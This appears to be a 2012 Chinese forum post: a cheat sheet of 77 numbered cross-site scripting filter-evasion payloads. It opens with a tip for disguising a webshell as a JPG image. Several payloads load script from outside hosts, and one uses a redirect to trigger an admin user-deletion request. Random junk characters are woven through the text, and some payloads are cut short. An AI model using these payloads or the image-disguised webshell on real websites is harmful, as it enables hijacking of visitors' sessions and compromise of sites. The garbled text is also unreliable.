跨站图片shell
% G+ y" e1 n7 h: y" aXSS跨站代码 <script>alert("")</script>
- }7 l6 u1 x) O7 h+ J6 U9 ?8 l
: S4 P5 C( V' S0 ?! l( \9 O+ P将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
, _0 k# F2 R2 Z5 R7 Y
h+ g8 c8 V' V( R" V' c2 l. }2 p4 R6 o3 o* ?3 ^6 @
: X5 \3 _; E, d, W! N5 H1)普通的XSS JavaScript注入
9 x+ b9 t' ~; z/ b1 V9 j# _<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 b; Y% J. J! w
* O0 a+ Z, G. J' _* B' J
(2)IMG标签XSS使用JavaScript命令. T% I7 a6 P! L
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- W, U. t' I: F. H) H
1 }: w. [1 O/ S# j
(3)IMG标签无分号无引号2 G7 Y- t3 H- r8 U- N6 g7 I
<IMG SRC=javascript:alert(‘XSS’)>4 }( b; _) L: f6 O% P9 w
/ @/ e J* @1 ^) A! r) y0 D, r(4)IMG标签大小写不敏感) S% ]2 K$ ^3 b2 v2 h, c
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ E) o/ g% j4 C8 j9 O j) C: d0 R0 P% e8 g F
(5)HTML编码(必须有分号)$ v& ?6 F' H6 i
<IMG SRC=javascript:alert(“XSS”)>6 O" t, V( w1 V1 r% J8 `' j+ I
1 [, @8 j6 O( Z& j(6)修正缺陷IMG标签
+ O" s- g+ k( S5 g3 ?<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 O7 G% P+ Y1 |. r+ N# t
/ b8 I# r' M* w* v; d(7)formCharCode标签(计算器): { c. S h0 e I! a8 J
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) T/ K* H( d& l
& C% i' s' z" G1 P- p8 E(8)UTF-8的Unicode编码(计算器)
' L2 _' I6 H: N7 s J5 m% `<IMG SRC=jav..省略..S')>. m$ X: K1 F8 V% R
' a r! T7 ^! p3 A# X- C! C! B# @
(9)7位的UTF-8的Unicode编码是没有分号的(计算器) o/ E# P7 {/ b
<IMG SRC=jav..省略..S')>
9 I Z+ K/ T8 `7 w* L* r
( R: z, d7 F9 b! M) j(10)十六进制编码也是没有分号(计算器)/ A$ Z9 Y; M- a
<IMG SRC=java..省略..XSS')>
3 X3 C, d% Y0 c9 R# M% _8 I) J& y9 P& V( L2 e' v
(11)嵌入式标签,将Javascript分开
- i4 j2 ~6 u. b4 y8 ^# ~<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 d& ^, u( j& U. E, w8 w4 S
9 ?; O& d( }1 `' k1 g(12)嵌入式编码标签,将Javascript分开
3 q. f5 E9 E" C: g* p: s# U<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 y4 N8 g2 `1 C+ [( k: T$ {- v, H) M, ~+ P3 s
(13)嵌入式换行符! t0 B" y3 I' h" U6 j+ }
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# K! H/ C0 N! ]+ K7 F2 J
' _- h- x1 t R0 s2 W/ H x(14)嵌入式回车$ M; A p. K4 B$ b" q/ Y; ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>. o# \7 C2 K4 i$ Z. h/ U' q& V
& ^/ ~: x: F( n/ W; |8 X
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
: S* d; S: ?' x7 m; X) d, D# Z<IMG SRC=”javascript:alert(‘XSS‘)”>
) Q; u d- o6 E' C3 M' L1 n0 W1 A
8 T# f7 d8 B, B: y(16)解决限制字符(要求同页面)+ Y; `! }$ T0 s F; w' D" D8 @
<script>z=’document.’</script> R0 A, N5 t1 w1 J- _
<script>z=z+’write(“‘</script>
/ A, L; b$ O; ]( K9 r; F9 ?! r7 Y9 k& Y<script>z=z+’<script’</script>* v% b: y1 q: O
<script>z=z+’ src=ht’</script>
3 V/ A$ x6 N! u' ?$ b<script>z=z+’tp://ww’</script>2 G3 V5 w' [1 Y2 q* G: x% Z9 \: q
<script>z=z+’w.shell’</script>
C/ |( |6 ?3 o1 n9 f# e) O<script>z=z+’.net/1.’</script>
$ {6 m" p1 X5 I" a, F<script>z=z+’js></sc’</script>
. I s" n; t# G4 g$ E0 Z4 Y6 u5 t. Y<script>z=z+’ript>”)’</script>$ y6 {8 B3 s3 H
<script>eval_r(z)</script>
8 D9 j1 h" O( `$ N8 @) |7 w* E) ]3 w6 F$ v* O5 J
(17)空字符( I' G! M! s& T9 |1 c& m
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
1 z, \: ~2 v1 d, H: `5 t! a7 n
3 x- B; e3 m( h" W4 |(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' n5 V( Q4 w1 X) B* D8 Z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out0 B6 e( u5 O0 ]7 t/ `( r
3 T) `% Y, j3 Y& Z(19)Spaces和meta前的IMG标签
" E. |' E; s: B7 X( |5 i. e8 _<IMG SRC=” javascript:alert(‘XSS’);”>
8 A9 A9 V; n7 S4 X; O; @
K4 ] \, Y, z( V) m; x(20)Non-alpha-non-digit XSS1 F! v7 {; o5 W% N% t$ {
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; }$ j( u! [7 v7 J- d' E# ?3 F+ r
' S0 K( R8 \- G( Z2 t$ u: D
(21)Non-alpha-non-digit XSS to 2' ]3 q+ Y; a1 `. Z$ R* S
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>, ]; |" j) k2 q) @( ?
% r: }4 ~1 }( Y5 h; ~
(22)Non-alpha-non-digit XSS to 3
: |- g/ [4 k: g2 Z5 n4 B/ `<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! A* c1 }* U; A" T8 u, i/ b- j/ ~+ q8 E! v1 R* r' ^0 r7 Y' q) f4 C
(23)双开括号
4 x5 G8 {& y: ~& _<<SCRIPT>alert(“XSS”);//<</SCRIPT> {, H- k2 j: b9 U: a: L
7 h/ h/ Y8 F& B3 D(24)无结束脚本标记(仅火狐等浏览器)) U2 u; G1 H9 e& P. e" a1 \8 A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! A8 B' W; v: _9 f
8 w6 X3 F; x- o s( }8 o( e(25)无结束脚本标记2
% J) v" r* K; z$ [ k/ }. g- P<SCRIPT SRC=//3w.org/XSS/xss.js>
8 ^- L, f1 F. u7 ^8 Y6 y1 @
! T9 { v0 u1 q6 Q2 ?# ~(26)半开的HTML/JavaScript XSS6 |& f& u: e! I/ q6 d
<IMG SRC=”javascript:alert(‘XSS’)”
2 B4 K$ @' i" W0 ?7 d) P
& B' X' |9 l% e2 l(27)双开角括号
. s# o9 S) @0 O<iframe src=http://3w.org/XSS.html <
- F4 |; f# ~+ ?0 {, v2 ^' q3 e
9 [- H& ] O# N7 g9 F& i(28)无单引号 双引号 分号
+ R' Y2 w' o. Y. w<SCRIPT>a=/XSS/
3 Y) {7 O/ B9 G$ U% K% g. A2 R2 M/ k* {alert(a.source)</SCRIPT>1 G, X! Y1 v; S; a* o) R
7 U& n* J2 S: s. r' j9 g
(29)换码过滤的JavaScript& K: \' M \2 \/ ^& |
\”;alert(‘XSS’);//( v) H+ [" ^4 ^; d+ ^4 w$ t
1 R! b7 r) S+ ?9 k0 U! @(30)结束Title标签
/ c* F- N" [0 c* L3 z</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& b( L) `) R3 \) m2 _% o! ?" Y; h/ `, U+ W5 l: b+ I# F
(31)Input Image0 ^. r! c0 e) R3 b4 O _% g
<INPUT SRC=”javascript:alert(‘XSS’);”>
. h ?" q* }2 [* g
( U4 B- k. K8 [( `- m(32)BODY Image9 X0 U: U& z, l+ a8 `
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>- x. E( t |7 i' X' A9 s
+ ^9 ~1 q% ^# D4 V! W0 \) A
(33)BODY标签7 M4 o$ f' V% p1 Z7 u; l
<BODY(‘XSS’)>
' w/ G9 K0 c1 m3 X) \3 ]
1 U% p7 i& \5 q2 ^: @(34)IMG Dynsrc& y/ J1 B. H. c! S4 [/ R& _/ t
<IMG DYNSRC=”javascript:alert(‘XSS’)”>% X% d7 q' ^0 [1 p+ w9 f) A
& J+ y8 g' B8 k @(35)IMG Lowsrc
% E: S! T% {! S1 I/ D<IMG LOWSRC=”javascript:alert(‘XSS’)”>' P" l& `! E% ^5 a
. a- O ^6 M2 q& C: J( _(36)BGSOUND7 N. V/ |6 h' I5 i- s1 S9 m
<BGSOUND SRC=”javascript:alert(‘XSS’);”>, d% d2 L0 C/ Z& k0 f
+ E/ l! ^7 I' C: f
(37)STYLE sheet/ U9 o" Q6 k4 D: h& I
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>' c: d j3 [8 L0 m: @9 a' T
$ J1 D4 ?: a0 d/ u$ V/ {
(38)远程样式表$ w% X! H7 Z. o* o# x
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
$ c n7 Y' b; t( f$ R$ U0 o2 S* j, P! y1 p/ C: u& k$ O3 _
(39)List-style-image(列表式)
* g" e# S5 x! k1 |, s6 G: [<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS" g! t) P( i! M" |- K( M9 _1 C
% N0 J9 R7 D) w3 l$ y(40)IMG VBscript8 M- D3 u2 S0 x7 a0 Q3 M+ h$ n% M& W
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! F) i, C3 r6 c$ O
" Z' i7 w: b! _! r2 F) V" V(41)META链接url& Q, ]2 N2 X( h! C+ n( O4 V0 w
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>7 ?/ y: `' w! V2 N* y
. H2 S9 X! \, s3 t8 x
(42)Iframe' j0 E) b3 n8 N5 V0 ~
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
# S$ A" m' w- R" P(43)Frame
# J% {% S! t4 C% u0 }<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
% P7 T# C) M+ ]1 E8 ?" ?& r/ ^9 E# S5 p7 R: _9 L9 w' z
(44)Table' V {& S- ?: y3 g
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 n6 E; d8 |2 S
* N- F e" ~) {8 @2 `8 Z, U. _1 T6 ]
(45)TD! y6 ?2 ?, x9 G: C; k9 w
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>7 T# c' L0 R4 l
+ S( P% \' c: R. {9 |- N
(46)DIV background-image
+ o& S B$ N* y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ r3 a* j$ [; q8 K
3 @6 i* L; L3 {' U5 k1 w(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
% j$ K" g" Z; W$ u6 } |<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
% M* K6 {" T. A1 ~# M, L3 _6 m
7 b8 @, z3 r& q(48)DIV expression9 ~+ W7 p: `+ j) f7 Z! [( G% l
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ F) } A7 r6 j1 q
7 R2 y0 \0 A5 R
(49)STYLE属性分拆表达& {6 r: T# h3 \
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# L; O7 p, i% V9 c6 i( M
( k E% h' R6 T! t* U7 F(50)匿名STYLE(组成:开角号和一个字母开头); Y X) O o5 g6 s0 L
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
# t3 D. I4 F; R; d2 G4 X) v6 ]6 Y; P3 b8 e$ G9 W4 o. S
(51)STYLE background-image( P, e- V8 |) x
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>/ z& i$ H# m. w& j6 j1 M2 c
) T; ?# k+ D2 a M2 F(52)IMG STYLE方式
' q3 W) E/ s5 Rexppression(alert(“XSS”))’>
2 w- p7 Y( q7 G( R6 Z
) p. S3 S; O4 \. ^ l& ^0 X, A(53)STYLE background- h* H& M; g0 L9 n7 V
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>$ D: `" U5 P9 x1 A0 A! H. D
+ l0 p8 m6 f5 b) J9 z
(54)BASE
! X: i0 B9 N# X" G# x) w<BASE HREF=”javascript:alert(‘XSS’);//”>$ a y" d6 A+ \$ U3 }4 b
, g7 w/ t4 @: g. g# U(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS' ?" }& N/ O3 X1 @+ H" Q
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 ^" f ^ X( s
! i/ c. m. t) h- |(56)在flash中使用ActionScrpt可以混进你XSS的代码7 l' W# G- W) z
a=”get”;
: n6 D' {6 @) P" a9 |9 y5 j9 ?b=”URL(\”";* x; t' v7 @6 v6 Y- h% H2 F& y0 F
c=”javascript:”;
! V5 O# Q \) |' u/ I# B Kd=”alert(‘XSS’);\”)”;$ O" e% c( C; X; ?! s: D C' b! u
eval_r(a+b+c+d);- }; N! g/ [1 n K5 r& i: B, w
- G: V/ J& w7 |4 r6 q(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上* S/ N- t+ _0 U, e& k6 f
<HTML xmlns:xss>$ b# w# d1 J4 B! ]: ~ N
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>% M" k: v; Z$ u6 U' q+ J
<xss:xss>XSS</xss:xss>4 L* V# O. O; ~7 M$ v5 J( X
</HTML>
7 Y9 \* P0 X" C# K$ C) b+ Q9 S
( J. e' I, V0 O1 D: q; U$ R e(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 y H6 m6 S( ^2 Q* l4 m$ T<SCRIPT SRC=””></SCRIPT>
& R; M8 l$ `8 a# }6 S3 a) v, N* o2 V. k: ]
(59)IMG嵌入式命令,可执行任意命令; ~2 z% O" ~4 {1 u6 Z
<IMG SRC=”http://www.XXX.com/a.php?a=b”>+ `" |; N1 J" W; r
9 A1 V6 ^4 D$ f2 u7 \(60)IMG嵌入式命令(a.jpg在同服务器)
; Y9 [, Q/ K$ Z" iRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser5 P! k6 y9 ^/ [8 ?( ?/ F/ V
# Z, x, a% p- @! a0 a+ d. h
(61)绕符号过滤
7 t" U# a2 F Q: _- S3 T" ?<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>* R+ l6 g3 d1 i& |6 B4 A9 M0 p
" j! l8 q* X6 e
(62)
; c& B8 ]6 {/ I9 A. M0 ~) v<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* ~7 S* |2 e' V1 y9 y6 A: B
9 X, u) s& ^7 \9 f% ?5 V
(63)+ M6 |/ y* h3 O
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>( E; Z& i4 v' Z5 |
, y5 G5 Q5 m1 E6 R" [: F+ N/ [(64)) ^; C9 }+ ]" S6 S# t7 _) l
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>* c5 H( d, w# ~- Y
9 V# u7 M: A6 d8 K( ?8 t8 I(65). ]4 U( \0 Z" y- }8 T
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
" H* q' `9 ~: T* @5 s: p; U, A! A
(66)* J( U6 D2 q2 \ C9 y9 r4 d9 g
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ k, O$ c. {+ U% }* i" H! \' _! o6 _, @+ c( y, u5 @
(67)
- N0 B0 V; J0 ^) l& d6 N<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
$ @+ X/ A9 v5 x! n7 T4 E
! f* q+ J7 N1 z/ x. b9 g2 H(68)URL绕行: ^* b ?/ s# p
<A HREF=”http://127.0.0.1/”>XSS</A>% O( p' z+ C. ~3 E
7 I R. k, P% z! [$ q! H2 [+ _(69)URL编码5 p# D+ f1 |) V4 o8 V0 ~
<A HREF=”http://3w.org”>XSS</A>
$ }7 }6 X. D/ S) i0 |! h- G' m/ I) G% P: Z2 [
(70)IP十进制
. g" D2 y. C% s<A HREF=”http://3232235521″>XSS</A>0 J2 K8 r9 H; N |! \3 o! P W
! M& O1 |/ P# [" I' }3 D9 T
(71)IP十六进制* I" E2 M! K( b; ~
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
7 J8 p7 R$ C$ h
" f" p, }! s i5 O7 p* {0 x(72)IP八进制$ V0 O! b: x; p6 ~$ _: h4 ?4 [
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
# e* ^' l6 Y- c" g q, J
# W" R- l" S, s% M9 D0 G(73)混合编码
$ G7 f L1 g5 f3 d<A HREF=”h
) c# N/ w, n6 }( v% f: _tt p://6 6.000146.0×7.147/”">XSS</A>! V. R2 g. s# R
! g v. D; u" u7 E" o. x9 S W(74)节省[http:], D# K) C) q4 d+ z" v4 { q
<A HREF=”//www.google.com/”>XSS</A>
7 |, h0 p( I. f8 b9 i
3 }& h4 q. y8 H1 R& B- E(75)节省[www]
6 N3 R! H% ~! e7 w* [9 d6 ?" f<A HREF=”http://google.com/”>XSS</A>! E# o; I8 Y2 V- `( x9 Z
3 k$ ]2 n/ Q) J1 U# P4 ^(76)绝对点绝对DNS
* ` `- L7 V. N6 Q<A HREF=”http://www.google.com./”>XSS</A>5 l1 c6 g# u; n% t) w& D; t' Y. |
* _7 r' ?. b x% m" u(77)javascript链接1 t! G* `4 A$ ?. w
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
6 y# _. R# I, J8 _" f% N+ T+ y |
发表于 2012-9-13 17:04:56
收藏
支持
反对